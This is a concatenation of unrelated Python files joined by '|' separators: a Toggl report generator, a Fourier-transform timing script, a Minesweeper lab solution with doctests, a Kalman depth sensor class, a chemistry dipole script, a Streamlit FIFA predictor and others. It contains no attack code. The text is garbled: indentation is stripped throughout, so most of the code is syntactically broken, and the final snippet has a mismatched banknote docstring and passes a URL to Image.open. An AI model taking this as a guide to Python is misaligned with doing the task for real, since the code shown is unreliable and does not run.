from os import walk
import os
from os.path import isfile, basename, expanduser, join
from datetime import datetime, timedelta
import sys
import re
from generator import WeeklyReportGenerator
from toggl.printer.html import HtmlPrinter
from toggl.datasource.csv import CsvReportParser
from toggl.datasource.web import ReportApi
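# guess_last_report() below looks for Toggl CSV exports in the given folder, named like
# "2014-04-21-2014-04-27 details.csv" (optionally with a " (2)"-style duplicate counter),
# and returns the newest one (latest start date, then highest counter).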
def guess_last_report(downloads_path):
    regex = re.compile(r"(?P<from>\d{4}-\d{2}-\d{2})-(?P<to>\d{4}-\d{2}-\d{2}) details(\s\((?P<order>\d+)\))?\.csv")
candidates = []
for (dir_path, dir_names, file_names) in walk(expanduser(downloads_path)):
candidates.extend(file_names)
break
report_files = []
for candidate in candidates:
parts = regex.match(basename(candidate))
if parts:
parts = parts.groupdict()
fr = datetime.strptime(parts["from"], "%Y-%m-%d")
if parts["order"] is not None:
order = int(parts["order"])
else:
order = 0
report_files.append((fr, order, candidate))
if len(report_files) == 0:
raise Exception("No candidate report files found :-(")
else:
print("Found the following report files:\n\t", [rf[2] for rf in report_files])
return join(downloads_path, sorted(report_files, key=lambda rf: (rf[0], rf[1]), reverse=True)[0][2])
def is_integer(s):
try:
int(s)
return True
except ValueError:
return False
def week_magic(day):
    """Return the Monday and Sunday of the week containing `day`
    (e.g. Wednesday 2014-04-23 -> Monday 2014-04-21 and Sunday 2014-04-27)."""
day_of_week = day.weekday()
to_beginning_of_week = timedelta(days=day_of_week)
beginning_of_week = day - to_beginning_of_week
to_end_of_week = timedelta(days=6 - day_of_week)
end_of_week = day + to_end_of_week
return beginning_of_week, end_of_week
def main():
if len(sys.argv) < 2:
raise Exception('Unexpected number of arguments: {0}!'.format(len(sys.argv)))
# csv ~/Downloads
if sys.argv[1] == 'csv':
if (len(sys.argv) == 3) and (isfile(sys.argv[2])):
file_path = sys.argv[2]
elif len(sys.argv) == 3:
file_path = guess_last_report(sys.argv[2])
else:
file_path = r"~/Downloads/2014-04-21-2014-04-2 details.csv"
data_source = CsvReportParser(file_path)
elif sys.argv[1] == 'web':
if len(sys.argv) >= 3 and sys.argv[2] == 'last':
since, until = week_magic(datetime.now() - timedelta(days=7))
clients = sys.argv[3:]
elif len(sys.argv) >= 3 and sys.argv[2] == 'this':
since, until = week_magic(datetime.now())
clients = sys.argv[3:]
elif len(sys.argv) >= 3 and is_integer(sys.argv[2]):
since, until = week_magic(datetime.now() - timedelta(days=7*int(sys.argv[2])))
clients = sys.argv[3:]
else:
since, until = week_magic(datetime.now())
clients = sys.argv[2:]
data_source = ReportApi(since, until, clients, debug=False)
else:
raise Exception('Unexpected data source: {0}'.format(sys.argv[1]))
report = WeeklyReportGenerator().generate(data_source)
HtmlPrinter(report).print_report()
if __name__ == "__main__":
main() |
import execjs
from login.db_helper import DatabaseHelper
from login.helper import Helper
from login.util import Util
if __name__ == '__main__':
helper = Helper()
# helper.get_friends_timeline(max_count=5)
    helper.get_someone_info('')  # pass the containerId here
pass
|
#!/usr/bin/python
import sys
import numpy as np
import matplotlib.pyplot as plt
import time
PATH="./"
OUTFILE="FT_data.txt"
INFILE="Compl_num.txt"
#----------subroutines--------------
def Read():
    data=[]  # data holds my Fourier coefficients f_i
try:
text = open(PATH+INFILE,'r') #open file to read
data=text.read().splitlines()
text.close()
return data
except:
        print 'Something went wrong in %s, subprogram Read(), while reading the data file' % sys.argv[0]
sys.exit()
def Write(data):
    text = open(PATH+OUTFILE,'w+')  # open file to write
for x in data:
text.write(str(x)+"\n") #write data to file
text.close()
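# The FT()/FTlong() routines below evaluate the slow O(N^2) discrete Fourier transform
#   f_n = (1/N) * sum_i exp(-2*pi*1j*n*i/N) * f_i   for n = -N/2 .. N/2-1,
# which the main program times against numpy's FFT; IFT()/IFTlong() are the corresponding
# inverse sums without the 1/N factor.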
def FT(data):
N=len(data)
# print "N"
# print N
fn=[]
    data = map(complex, data)  # actually convert the input strings to complex (the bare map() call discarded its result)
n=-N/2
i=-N/2
while n<=N/2-1:
# print "n=",n+N/2
fn.append(0.0j)
for fi in data:
fn[n+N/2]+=1.0/(N)*np.exp(-2.0*np.pi*n*1.0j*i/(N))*fi
# print i
i+=1
n+=1
i=-N/2
return fn
def FTlong(data):
N=len(data)
# print "N"
# print N
fn=[]
    data = map(complex, data)  # actually convert the input strings to complex
n=-N/2
i=-N/2
while n<=N/2-1+N:
# print "n=",n+N/2
fn.append(0.0j)
for fi in data:
fn[n+N/2]+=1.0/(N)*np.exp(-2.0*np.pi*n*1.0j*i/(N))*fi
# print i
i+=1
n+=1
i=-N/2
return fn
def IFT(data):
N=len(data)
# print "N"
# print N
fn=[]
map(complex,fn)
n=-N/2
i=-N/2
while n<=(N/2-1):
# print "n=",n+N/2
fn.append(0.0)
for fi in data:
fn[n+N/2]+=1.0*np.exp(2.0*np.pi*n*1.0j*i/N)*fi
# print i
i+=1
n+=1
i=-N/2
return fn
def IFTlong(data):
N=len(data)
# print "N"
# print N
fn=[]
map(complex,fn)
n=-N/2
i=-N/2
while n<=(N/2-1+N):
# print "n=",n+N/2
fn.append(0.0)
for fi in data:
fn[n+N/2]+=1.0*np.exp(2.0*np.pi*n*1.0j*i/N)*fi
# print i
i+=1
n+=1
i=-N/2
return fn
#--------------Main Program---------------
def main():
fi=[]
tft=[]
tfft=[]
Nmax=200
N=2
while N<=Nmax:
i=0
fi=[]
while i<N:
fi.append(np.cos(i*2*np.pi/N)+0.j)
i+=1
N+=2
start=time.time()
FT(fi)
end=time.time()
tft.append(end-start)
start=time.time()
np.fft.fft(fi)
end=time.time()
tfft.append(end-start)
x=np.linspace(2,Nmax,Nmax/2)
plt.subplot(2,1,1)
plot2=plt.plot(x,tft)
plt.subplot(2,1,2)
plot1=plt.plot(x,tfft)
# plt.subplot(3,1,3)
# plot3=plt.plot(x1,fn)
plt.show()
if __name__=="__main__":
main()
|
# 1. A function as the return value of another function
def test():
print("我是test函数")
return 'hello'
def demo():
print("我是demo函数")
return test
def bar():
print("我是bar函数")
return test()
a = bar()
print(a)
x = test()
print(x)
y = demo()  # y is the test function, i.e. an alias for test
print(y)
z = y()
print(z) # 'hello'
# 2. A function as a parameter of another function (a minimal sketch follows)
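# A minimal sketch of case 2 (not part of the original lesson): passing a function
# as an argument to another function.
def apply_twice(func, value):
    return func(func(value))
print(apply_twice(lambda n: n + 3, 4))  # prints 10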
# 3. Defining a function inside another function
def outer():
    x = 10  # a local variable defined in the outer function
def inner():
        # how to modify the outer function's local variable from inside the inner function
        nonlocal x  # here x is no longer a new variable; it refers to the outer function's local x
y = x + 1
print("y=", y)
print("outer的x变量", x)
return inner
outer()()
|
# first_list = "arp, live, strong".split(", ")
# second_list = "lively, alive, harp, sharp, armstrong".split(", ")
first_list = input().split(", ")
second_list = input().split(", ")
results = [
res for res in first_list for _res in second_list if res in _res]
# results = []
# for item in first_list:
# for second_item in second_list:
# if item in second_item:
# results.append(item)
# break
print(list(dict.fromkeys(results)))
|
#!/usr/bin/env python3
"""6.009 Lab -- Six Double-Oh Mines"""
# NO IMPORTS ALLOWED!
def dump(game):
"""
Prints a human-readable version of a game (provided as a dictionary)
"""
for key, val in sorted(game.items()):
if isinstance(val, list) and val and isinstance(val[0], list):
print(f'{key}:')
for inner in val:
print(f' {inner}')
else:
print(f'{key}:', val)
def new_nd_list(dimensions, val=0):
"""
Creates an n-dimensional array recursively.
Parameters:
dimensions (tuple): Tuple of ints, representing each dimension size
val (any): Default value for cells
Returns:
Return an n-dimensional list.
>>> new_nd_list((3,2), 5)
[[5, 5], [5, 5], [5, 5]]
>>> new_nd_list((4,3,2), '1')
[[['1', '1'], ['1', '1'], ['1', '1']], [['1', '1'], ['1', '1'], ['1', '1']], [['1', '1'], ['1', '1'], ['1', '1']], [['1', '1'], ['1', '1'], ['1', '1']]]
"""
if len(dimensions) == 0:
return val
dim = dimensions[0]
return [new_nd_list(dimensions[1:], val) for i in range(dim)]
def new_nd_diffs(n):
"""
Parameters:
n (int): Number of dimensions
Returns:
    Returns a generator of 3**n tuples of n diff values ranging from -1 to 1.
>>> tuple(new_nd_diffs(1))
((-1,), (0,), (1,))
>>> tuple(new_nd_diffs(2))
((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 0), (0, 1), (1, -1), (1, 0), (1, 1))
>>> tuple(new_nd_diffs(3))
((-1, -1, -1), (-1, -1, 0), (-1, -1, 1), (-1, 0, -1), (-1, 0, 0), (-1, 0, 1), (-1, 1, -1), (-1, 1, 0), (-1, 1, 1), (0, -1, -1), (0, -1, 0), (0, -1, 1), (0, 0, -1), (0, 0, 0), (0, 0, 1), (0, 1, -1), (0, 1, 0), (0, 1, 1), (1, -1, -1), (1, -1, 0), (1, -1, 1), (1, 0, -1), (1, 0, 0), (1, 0, 1), (1, 1, -1), (1, 1, 0), (1, 1, 1))
"""
if n == 0:
yield None
return
if n == 1:
for i in range(-1, 2):
yield (i,)
return
for diff in new_nd_diffs(1):
for subdiff in new_nd_diffs(n-1):
yield diff + subdiff
def get_surrounding_indexes(index):
"""
Get tuple of indexes surrounding provided index
by adding values of index with values of diffs provided by new_nd_diffs.
Each index is also an n-tuple of ints.
Parameters:
index (tuple): n-tuple of ints
Returns:
    Returns a generator of the 3**n - 1 indexes surrounding the provided index (the provided index itself is excluded).
>>> tuple(get_surrounding_indexes((0,)))
((-1,), (1,))
>>> tuple(get_surrounding_indexes((3,)))
((2,), (4,))
>>> tuple(get_surrounding_indexes((0,0)))
((-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1))
>>> tuple(get_surrounding_indexes((2,2)))
((1, 1), (1, 2), (1, 3), (2, 1), (2, 3), (3, 1), (3, 2), (3, 3))
>>> tuple(get_surrounding_indexes((1, 4, 8)))
((0, 3, 7), (0, 3, 8), (0, 3, 9), (0, 4, 7), (0, 4, 8), (0, 4, 9), (0, 5, 7), (0, 5, 8), (0, 5, 9), (1, 3, 7), (1, 3, 8), (1, 3, 9), (1, 4, 7), (1, 4, 9), (1, 5, 7), (1, 5, 8), (1, 5, 9), (2, 3, 7), (2, 3, 8), (2, 3, 9), (2, 4, 7), (2, 4, 8), (2, 4, 9), (2, 5, 7), (2, 5, 8), (2, 5, 9))
"""
for diff in new_nd_diffs(len(index)):
pair = zip(index, diff)
neighbour = tuple(map(sum, pair))
if neighbour != index:
yield neighbour
def get_indexes(dimensions):
"""
Get all possible indexes for given dimensions.
Parameters:
dimensions (tuple): Tuple of ints, representing each dimension size
Returns:
Returns a generator of n-tuples
>>> tuple(get_indexes((3,)))
((0,), (1,), (2,))
>>> tuple(get_indexes((3,2)))
((0, 0), (0, 1), (1, 0), (1, 1), (2, 0), (2, 1))
"""
if len(dimensions) == 0:
yield tuple()
return
dim = dimensions[0]
    if len(dimensions) == 1:
for i in range(dim):
yield (i,)
return
for i in range(dim):
for j in get_indexes(dimensions[1:]):
yield (i,) + j
def get_innermost_list(board, index):
"""
Given the n-dimensional board and n-tuple index,
return the innermost list according to the specified index
along with last element from index.
Dimension of the board and size of index must be equal.
Parameters:
board (list): n-dimensional list
index (tuple): tuple with n values
Returns:
Returns a tuple (innermost_list, index[-1]) if index is valid, otherwise (None, None)
>>> get_innermost_list([[1, 2], [3, 4]], (1, 0))
([3, 4], 0)
>>> get_innermost_list([[1, 2], [3, 4]], (-1, 2))
(None, None)
>>> get_innermost_list([[1, 2], [3, 4]], (-1, -1))
(None, None)
"""
inner = board
for i in index[:-1]:
if i < 0 or i >= len(inner):
return None, None
inner = inner[i]
i = index[-1]
if i < 0 or i >= len(inner):
return None, None
return inner, i
def set_value(board, index, val):
"""
Set the value at a specified n-tuple index in n-dimensional list.
Dimension of the list and size of index must be equal.
Parameters:
board (list): n-dimensional list
index (tuple): tuple with n values
val (any): value to set or a setter function which receives current value as parameter and returns new value
Returns:
None
"""
cell, i = get_innermost_list(board, index)
if cell is not None:
cell[i] = val(cell[i]) if callable(val) else val
def get_value(board, index):
"""
Get the value at a specified n-tuple index in n-dimensional list.
Dimension of the list and size of index must be equal.
Parameters:
board (list): n-dimensional list
index (tuple): tuple with n values
Returns:
value (any): value at a given index
>>> get_value([[1, 2], [3, 4]], (1, 0))
3
>>> get_value([[1, 2], [3, 4]], (-1, 2)) is None
True
>>> get_value([[1, 2], [3, 4]], (-1, -1)) is None
True
"""
cell, i = get_innermost_list(board, index)
return None if cell is None else cell[i]
# 2-D IMPLEMENTATION
def new_game_2d(num_rows, num_cols, bombs):
"""
Start a new game.
Return a game model dictionary with following properties:
'dimensions' - tuple with value of (num_rows, num_cols)
'state' - string, one of following values ('ongoing', 'victory', 'defeat')
'board' - 2-dimensional array, with cell values of 0-8 (number of neighbour bombs) or '.' (bomb)
'mask' - 2-dimensional array with boolean cell values, indicating which cells are revealed
Parameters:
num_rows (int): Number of rows
num_cols (int): Number of columns
bombs (list): List of bombs, given in (row, column) pairs, which are
tuples
Returns:
A game object dictionary
>>> dump(new_game_2d(2, 4, [(0, 0), (1, 0), (1, 1)]))
board:
['.', 3, 1, 0]
['.', '.', 1, 0]
dimensions: (2, 4)
mask:
[False, False, False, False]
[False, False, False, False]
state: ongoing
"""
return new_game_nd((num_rows, num_cols), bombs)
def dig_2d(game, row, col):
"""
Reveal the cell at (row, col) and set game['mask'][row][col] to True.
If the revealed cell has the bomb, change game state to 'defeat'.
If the cell has no adjacent bombs, recursively reveal its direct neighbours.
If all the cells except the bomb cells are revealed, change game state to 'victory'.
Return number of revealed cells in total.
Parameters:
game (dict): Game object
row (int): Where to start digging (row)
col (int): Where to start digging (col)
Returns:
int: the number of new cells revealed
>>> game = new_game_2d(2, 4, [(0, 0), (1, 0), (1, 1)])
>>> game['mask'][0][1] = True
>>> dig_2d(game, 0, 3)
4
>>> dump(game)
board:
['.', 3, 1, 0]
['.', '.', 1, 0]
dimensions: (2, 4)
mask:
[False, True, True, True]
[False, False, True, True]
state: victory
>>> game = new_game_2d(2, 4, [(0, 0), (1, 0), (1, 1)])
>>> game['mask'][0][1] = True
>>> dig_2d(game, 0, 0)
1
>>> dump(game)
board:
['.', 3, 1, 0]
['.', '.', 1, 0]
dimensions: (2, 4)
mask:
[True, True, False, False]
[False, False, False, False]
state: defeat
"""
return dig_nd(game, (row, col))
def render_2d(game, xray=False):
"""
Prepare a game for display.
Returns a two-dimensional array (list of lists) of '_' (hidden squares), '.'
(bombs), ' ' (empty squares), or '1', '2', etc. (squares neighboring bombs).
game['mask'] indicates which squares should be visible. If xray is True (the
default is False), game['mask'] is ignored and all cells are shown.
Parameters:
game (dict): Game state
xray (bool): Whether to reveal all tiles or just the ones allowed by
game['mask']
Returns:
A 2D array (list of lists)
>>> render_2d({'dimensions': (2, 4),
... 'state': 'ongoing',
... 'board': [['.', 3, 1, 0],
... ['.', '.', 1, 0]],
... 'mask': [[False, True, True, False],
... [False, False, True, False]]}, False)
[['_', '3', '1', '_'], ['_', '_', '1', '_']]
>>> render_2d({'dimensions': (2, 4),
... 'state': 'ongoing',
... 'board': [['.', 3, 1, 0],
... ['.', '.', 1, 0]],
... 'mask': [[False, True, False, True],
... [False, False, False, True]]}, True)
[['.', '3', '1', ' '], ['.', '.', '1', ' ']]
"""
return render_nd(game, xray)
def render_ascii(game, xray=False):
"""
Render a game as ASCII art.
Returns a string-based representation of argument 'game'. Each tile of the
game board should be rendered as in the function 'render_2d(game)'.
Parameters:
game (dict): Game state
xray (bool): Whether to reveal all tiles or just the ones allowed by
game['mask']
Returns:
A string-based representation of game
>>> print(render_ascii({'dimensions': (2, 4),
... 'state': 'ongoing',
... 'board': [['.', 3, 1, 0],
... ['.', '.', 1, 0]],
... 'mask': [[True, True, True, False],
... [False, False, True, False]]}))
.31_
__1_
"""
result = render_2d(game, xray)
result = [''.join(row) for row in result]
return '\n'.join(result)
# N-D IMPLEMENTATION
def new_game_nd(dimensions, bombs):
"""
Start a new game.
Return a game model dictionary with following properties:
    'dimensions' - same as the input dimensions
    'state' - string, one of following values ('ongoing', 'victory', 'defeat')
    'board' - N-dimensional array, with cell values equal to the number of neighbouring bombs or '.' (bomb)
    'mask' - N-dimensional array with boolean cell values, indicating which cells are revealed
Parameters:
dimensions (tuple): Dimensions of the board
bombs (list): Bomb locations as a list of lists, each an
N-dimensional coordinate
Returns:
A game object dictionary
>>> g = new_game_nd((2, 4, 2), [(0, 0, 1), (1, 0, 0), (1, 1, 1)])
>>> dump(g)
board:
[[3, '.'], [3, 3], [1, 1], [0, 0]]
[['.', 3], [3, '.'], [1, 1], [0, 0]]
dimensions: (2, 4, 2)
mask:
[[False, False], [False, False], [False, False], [False, False]]
[[False, False], [False, False], [False, False], [False, False]]
state: ongoing
"""
board = new_nd_list(dimensions, 0)
mask = new_nd_list(dimensions, False)
def setter(val):
if val is not None and val != '.':
return val + 1
return val
for bomb in bombs:
set_value(board, bomb, '.')
for index in get_surrounding_indexes(bomb):
set_value(board, index, setter)
return {
'dimensions': dimensions,
'board' : board,
'mask' : mask,
'state': 'ongoing',
}
def dig_nd(game, coordinates, cache={}):
"""
Reveal the cell at coordinates and set game['mask'] at coordinates to True.
If the revealed cell has the bomb, change game state to 'defeat'.
If the cell has no adjacent bombs, recursively reveal its direct neighbours.
If all the cells except the bomb cells are revealed, change game state to 'victory'.
Return number of revealed cells in total.
Parameters:
game (dict): Game object
coordinates (tuple): Where to start digging
Returns:
int: the number of new cells revealed
>>> g = new_game_nd((2, 4, 2), [(0, 0, 1), (1, 0, 0), (1, 1, 1)])
>>> g['mask'][0][1][1] = True
>>> dig_nd(g, (0, 3, 0))
8
>>> dump(g)
board:
[[3, '.'], [3, 3], [1, 1], [0, 0]]
[['.', 3], [3, '.'], [1, 1], [0, 0]]
dimensions: (2, 4, 2)
mask:
[[False, False], [False, True], [True, True], [True, True]]
[[False, False], [False, False], [True, True], [True, True]]
state: ongoing
>>> g = new_game_nd((2, 4, 2), [(0, 0, 1), (1, 0, 0), (1, 1, 1)])
>>> g['mask'][0][1][1] = True
>>> dig_nd(g, (0, 0, 1))
1
>>> dump(g)
board:
[[3, '.'], [3, 3], [1, 1], [0, 0]]
[['.', 3], [3, '.'], [1, 1], [0, 0]]
dimensions: (2, 4, 2)
mask:
[[False, True], [False, True], [False, False], [False, False]]
[[False, False], [False, False], [False, False], [False, False]]
state: defeat
"""
if game['state'] in ('defeat', 'victory'):
return 0
board = game['board']
mask = game['mask']
if get_value(mask, coordinates):
return 0
set_value(mask, coordinates, True)
val = get_value(board, coordinates)
if val == '.':
game['state'] = 'defeat'
return 1
if 'board' not in cache or cache['board'] != board:
covered = 0
bombs = 0
for index in get_indexes(game['dimensions']):
covered += 0 if get_value(mask, index) else 1
bombs += 1 if get_value(board, index) == '.' else 0
cache['covered'] = covered
cache['bombs'] = bombs
cache['board'] = board
else:
cache['covered'] -= 1
covered = cache['covered']
bombs = cache['bombs']
if covered == bombs:
game['state'] = 'victory'
return 1
revealed = 1
if val == 0:
for nindex in get_surrounding_indexes(coordinates):
shown = get_value(mask, nindex)
if shown is not None and not shown and get_value(board, nindex) != '.':
revealed += dig_nd(game, nindex)
return revealed
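# Note on dig_nd's `cache={}` default argument: the mutable default is reused across
# calls as a memo of the covered-cell and bomb counts for the current board, so the
# victory check does not have to rescan the whole board on every recursive dig.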
def render_nd(game, xray=False):
"""
Prepare the game for display.
Returns an N-dimensional array (nested lists) of '_' (hidden squares),
'.' (bombs), ' ' (empty squares), or '1', '2', etc. (squares
neighboring bombs). The mask indicates which squares should be
visible. If xray is True (the default is False), the mask is ignored
and all cells are shown.
Args:
xray (bool): Whether to reveal all tiles or just the ones allowed by
the mask
Returns:
An n-dimensional array of strings (nested lists)
>>> g = {'dimensions': (2, 4, 2),
... 'board': [[[3, '.'], [3, 3], [1, 1], [0, 0]],
... [['.', 3], [3, '.'], [1, 1], [0, 0]]],
... 'mask': [[[False, False], [False, True], [True, True], [True, True]],
... [[False, False], [False, False], [True, True], [True, True]]],
... 'state': 'ongoing'}
>>> render_nd(g, False)
[[['_', '_'], ['_', '3'], ['1', '1'], [' ', ' ']],
[['_', '_'], ['_', '_'], ['1', '1'], [' ', ' ']]]
>>> render_nd(g, True)
[[['3', '.'], ['3', '3'], ['1', '1'], [' ', ' ']],
[['.', '3'], ['3', '.'], ['1', '1'], [' ', ' ']]]
"""
def helper(board, mask):
for i in range(len(board)):
cell = board[i]
if isinstance(cell, list):
yield list(helper(cell, mask[i]))
else:
val = (' ' if cell == 0 else str(cell)) if xray or mask[i] else '_'
yield val
board = game['board']
mask = game['mask']
return list(helper(board, mask))
if __name__ == "__main__":
# Test with doctests. Helpful to debug individual lab.py functions.
import doctest
_doctest_flags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS
doctest.testmod(optionflags=_doctest_flags) #runs ALL doctests
# Alternatively, can run the doctests JUST for specified function/methods,
# e.g., for render_2d or any other function you might want. To do so, comment
# out the above line, and uncomment the below line of code. This may be
# useful as you write/debug individual doctests or functions. Also, the
# verbose flag can be set to True to see all test results, including those
# that pass.
#
# doctest.run_docstring_examples(get_surrounding_indexes, globals(), optionflags=_doctest_flags, verbose=False)
|
from model_and_config import config, models
import os
import argparse
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
parser = argparse.ArgumentParser()
parser.add_argument('--model_name', type=str, default='LSTMCapsNet', help='name of the model')
args = parser.parse_args()
model = {'LSTMCapsNet': models.LSTMCapsNet}
con = config.Config()
con.load_test_data()
con.set_test_model(model[args.model_name])
a = list(range(2, 15))
con.set_epoch_range(a)
con.test()
|
# We need to import the filter we are going to use
from KalmanFilter import *
import numpy
import ms5837
import time
class DepthSensor:
    def __init__(self):
        self.currentDepth = 0  # Relative to the MSL
        self.sensor = ms5837.MS5837_30BA()
        # A is the matrix that converts the last state to the new one; in our case it's just 1 because we get depth measurements directly
        A = numpy.matrix([1])
        # H is the matrix that converts sensor readings into state variables; since we get the readings directly from the sensor this is 1
        H = numpy.matrix([1])
        # B is the control matrix; since this is a 1D case and we have no inputs that we can change, we can set this to zero
        B = 0
        # Q is the process covariance; since we want accurate values we set this to a very low value
        Q = numpy.matrix([0.00001])
        # R is the measurement covariance; using a conservative estimate of 0.1 is fair
        R = numpy.matrix([0.1])
        # IC is the original prediction of the depth; setting this to normal room conditions makes sense
        IC = self.currentDepth
        # P is the initial prediction of the covariance; setting it to 1 is reasonable
        P = numpy.matrix([1])
        # We must initialize the sensor before reading it
        self.sensor.init()
        # Create the filter
        self._filter = KalmanFilter(A, B, H, IC, P, Q, R)
def UpdateValue(self):
if (self.sensor.read()):
self._filter.Step(numpy.matrix([0]),numpy.matrix([self.sensor.depth()]))
self.currentDepth = self._filter.GetCurrentState()[0,0]
return [self.sensor.depth(),self.currentDepth] |
from django.apps import AppConfig
class ProductosserviciosConfig(AppConfig):
name = 'productosServicios'
|
import numpy as np
import matplotlib.pyplot as plt
from ProtWaterPES import Dipole
import multiprocessing as mp
from Imp_samp_testing import EckartsSpinz
from Imp_samp_testing import MomentOfSpinz
har2wave = 219474.6
ang2bohr = 1.e-10/5.291772106712e-11
ref = np.array([
[0.000000000000000, 0.000000000000000, 0.000000000000000],
[-2.304566686034061, 0.000000000000000, 0.000000000000000],
[-2.740400260927908, 1.0814221449986587E-016, -1.766154718409233],
[2.304566686034061, 0.000000000000000, 0.000000000000000],
[2.740400260927908, 1.0814221449986587E-016, 1.766154718409233],
])
me = 9.10938356e-31
Avo_num = 6.0221367e23
m_O = 15.994915 / (Avo_num*me*1000)
m_H = 1.007825 / (Avo_num*me*1000)
m_D = 2.01410177812 / (Avo_num*me*1000)
mass = np.array([m_H, m_O, m_H, m_O, m_H])
MOM = MomentOfSpinz(ref, mass)
ref = MOM.coord_spinz()
def all_dists(coords):
bonds = [[1, 2], [3, 4], [1, 3], [1, 0]]
cd1 = coords[:, tuple(x[0] for x in np.array(bonds))]
cd2 = coords[:, tuple(x[1] for x in np.array(bonds))]
dis = np.linalg.norm(cd2 - cd1, axis=2)
a_oh = 1/np.sqrt(2)*(dis[:, 0]-dis[:, 1])
s_oh = 1/np.sqrt(2)*(dis[:, 0]+dis[:, 1])
mid = dis[:, 2]/2
sp = mid - dis[:, -1]*np.cos(roh_roo_angle(coords, dis[:, -2], dis[:, -1]))
return np.vstack((a_oh, dis[:, 0], dis[:, 1], s_oh, dis[:, -2], sp)).T
def roh_roo_angle(coords, roo_dist, roh_dist):
v1 = (coords[:, 1]-coords[:, 3])/np.broadcast_to(roo_dist[:, None], (len(roo_dist), 3))
v2 = (coords[:, 1]-coords[:, 0])/np.broadcast_to(roh_dist[:, None], (len(roh_dist), 3))
v1_new = np.reshape(v1, (v1.shape[0], 1, v1.shape[1]))
v2_new = np.reshape(v2, (v2.shape[0], v2.shape[1], 1))
aang = np.arccos(np.matmul(v1_new, v2_new).squeeze())
return aang
class DipHolder:
dip = None
@classmethod
def get_dip(cls, coords):
if cls.dip is None:
cls.dip = Dipole(coords.shape[1])
return cls.dip.get_dipole(coords)
get_dip = DipHolder.get_dip
def dip(coords):
coords = np.array_split(coords, mp.cpu_count()-1)
V = pool.map(get_dip, coords)
dips = np.concatenate(V)
return dips
pool = mp.Pool(mp.cpu_count()-1)
ground_coords = np.zeros((10, 27, 5000, 5, 3))
ground_erefs = np.zeros((10, 20000))
ground_weights = np.zeros((10, 27, 5000))
for i in range(10):
blah = np.load(f'ground_state_2d_h3o2_{i+1}.npz')
coords = blah['coords']
eref = blah['Eref']
weights = blah['weights']
ground_coords[i] = coords
ground_erefs[i] = eref
ground_weights[i] = weights
print(np.mean(np.mean(ground_erefs[:, 5000:], axis=1), axis=0)*har2wave)
average_zpe = np.mean(np.mean(ground_erefs[:, 5000:], axis=1), axis=0)*har2wave
std_zpe = np.std(np.mean(ground_erefs[:, 5000:]*har2wave, axis=1))
# excite_neg_coords = np.zeros((5, 27, 5000, 5, 3))
# excite_neg_erefs = np.zeros((5, 20000))
# excite_neg_weights = np.zeros((5, 27, 5000))
# for i in range(5):
# blah = np.load(f'XH_excite_state_h3o2_{i+1}.npz')
# coords = blah['coords']
# eref = blah['Eref']
# weights = blah['weights']
# excite_neg_coords[i] = coords
# excite_neg_erefs[i] = eref
# excite_neg_weights[i] = weights
|
from typing import Tuple
from generator.exceptions import GeneratorBufferError
from generator.buffers.buffer import Buffer
from generator.widget_base import Widget
class NavigationBuffer(Buffer):
def __init__(self):
super().__init__()
self._navigation_state = (0, 0) # line, pos in line
def make_command(self):
pass
def put(self, nav_state: Tuple[int, int]):
"""
:param nav_state: First position is line in file, second is position in line
"""
if nav_state[0] >= 0 and nav_state[1] >= 0:
self._navigation_state = nav_state
else:
raise GeneratorBufferError('Cannot set navigation to negative lines in NavigationBuffer.')
def peek(self):
return self._navigation_state
def clear(self):
self._navigation_state = (0, 0)
class NavigationBufferWidget(Widget):
def __init__(self, nav_buffer: Buffer):
self._buffer = nav_buffer
def display(self, screen, *args, **kwargs):
"""
:param args: should be (y, x) with position to display on the screen
:param kwargs: optional reverse argument. If set, the x position is assumed to be the end position
:return None
"""
text = "{}L:{}c".format(self._buffer.peek()[0], self._buffer.peek()[1])
y, x = args[0]
if 'reverse' in kwargs and kwargs['reverse'] is True:
x = self.cols(screen) - len(text) - 1
screen.addstr(y, x, text)
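# Minimal usage sketch (an assumption, not part of this module; `screen` would be a
# curses window obtained elsewhere, e.g. from curses.initscr()):
#   nav = NavigationBuffer()
#   nav.put((12, 40))                                    # line 12, column 40
#   NavigationBufferWidget(nav).display(screen, (0, 0), reverse=True)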
|
#!/usr/bin/python
from numpy import *
import pylab as lab
n, dt = 200, 0.5
x,y = meshgrid(arange(n,dtype=float32)/n, arange(n,dtype=float32)/n)
u = exp(-((x-0.2)*20.)**2 -((y-0.3)*20.)**2)
v = zeros((n,n), dtype=float32)
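# Explicit time stepping of the 2-D wave equation (unit wave speed and grid spacing):
# the stencil 4*u - (four neighbours) is minus the discrete Laplacian, so each loop
# iteration below does v += laplacian(u)*dt followed by u += v*dt on interior points.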
lab.ion()
image = lab.imshow(u, cmap='cool')
for i in range(100000):
v[1:-1,1:-1] -= (4.*u[1:-1,1:-1]-u[:-2,1:-1]-
u[2:,1:-1]-u[1:-1,:-2]-u[1:-1,2:])*dt
u[1:-1,1:-1] += v[1:-1,1:-1] * dt
if i % 10 == 0:
image.set_data(u)
image.autoscale()
lab.draw()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 13 02:20:31 2020
@author:
"""
# -*- coding: utf-8 -*-
"""
Created on Fri May 15 12:50:04 2020
@author: Dhruv.Shah
"""
import numpy as np
import pickle
import pandas as pd
#from flasgger import Swagger
import streamlit as st
from PIL import Image
#app=Flask(__name__)
#Swagger(app)
pickle_in = open("fifa.pkl","rb")
predicter=pickle.load(pickle_in)
#@app.route('/')
def welcome():
    # NOTE: Image.open() expects a local file path or file object, not a URL, so this
    # unused helper would fail as written; the image would need to be downloaded first.
    image = Image.open('https://www.google.com/url?sa=i&url=https%3A%2F%2Fwww.kolpaper.com%2F4803%2Ffifa-20-bvb-wallpaper%2F&psig=AOvVaw2enWW8sVHm1RiM4UCp67LL&ust=1593449103566000&source=images&cd=vfe&ved=0CAIQjRxqFwoTCOCXnNr6pOoCFQAAAAAdAAAAABAD.jpg')
st.image(image, caption=None, width=None, use_column_width=False, clamp=False, channels='RGB', format='JPEG')
return "Welcome All"
#@app.route('/predict',methods=["Get"])
def predict_overall(WeakFoot, HeadingAccuracy, Dribbling,SprintSpeed
,Reactions,Strength,Interceptions, shooting_attributes
,passing_attribtes):
"""Let's Authenticate the Banks Note
This is using docstrings for specifications.
---
parameters:
- name: variance
in: query
type: number
required: true
- name: skewness
in: query
type: number
required: true
- name: curtosis
in: query
type: number
required: true
- name: entropy
in: query
type: number
required: true
responses:
200:
description: The output values
"""
